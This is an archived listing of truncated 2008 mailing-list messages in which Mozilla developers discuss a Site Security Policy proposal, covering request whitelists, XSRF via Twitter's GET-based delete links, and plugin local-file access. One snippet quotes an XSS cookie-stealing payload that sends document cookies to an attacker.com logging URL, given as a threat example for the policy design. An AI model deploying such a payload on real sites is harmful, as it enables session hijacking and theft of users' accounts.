Re: Site Security Policy

2008-06-24 Thread bste...@mozilla.com
On Jun 12, 3:56 am, Gervase Markham <[EMAIL PROTECTED]> wrote: > [EMAIL PROTECTED] wrote: > > Analyzed, no... but I agree that the Request-Source checks should only > > be made for non-safe methods. > Yes; I think the current write-up is confusing on this point. I've updated the proposal to make t

Re: Object tag element opened with "Open File" -- Local File Security

2008-06-24 Thread ben . azan
On Jun 20, 5:34 pm, Boris Zbarsky <[EMAIL PROTECTED]> wrote: > [EMAIL PROTECTED] wrote: > > If I point the browser directly to the mp3 file on the local file > > system, the quicktime plug-in opens and plays the file, no problemo. > > OK. > > > The Page Info in the media tab, has the URI of the mp3

Re: Site Security Policy

2008-06-24 Thread Terri
Messed around a bit and noticed that you can indeed post using a GET request to Twitter. This looks to be somewhat XSRF protected with a authorization token, so hopefully it's not dead simple to exploit. However, the delete requests are just simple GETs of the form http://twitter.com/status/destr

Re: Site Security Policy

2008-06-24 Thread Terri
> It's true that information travels this way, but the "leaky" request > will never be made unless attacker.com is in the Request-Target > whitelist. So there is no leak. Ah! You're right, I had confused that for some reason. If all requests are still covered by Request-Target, then we're good f

Re: Site Security Policy

2008-06-24 Thread Gervase Markham
Terri wrote: > On Jun 17, 9:25 am, Gervase Markham <[EMAIL PROTECTED]> wrote: >> What's the use case for locking down all page communications? > > The traditional one: XSS cookie-stealing attacks like this: > > var image = new Image(); > image.src= ’http://attacker.com/log.php?cookie=’ + > encode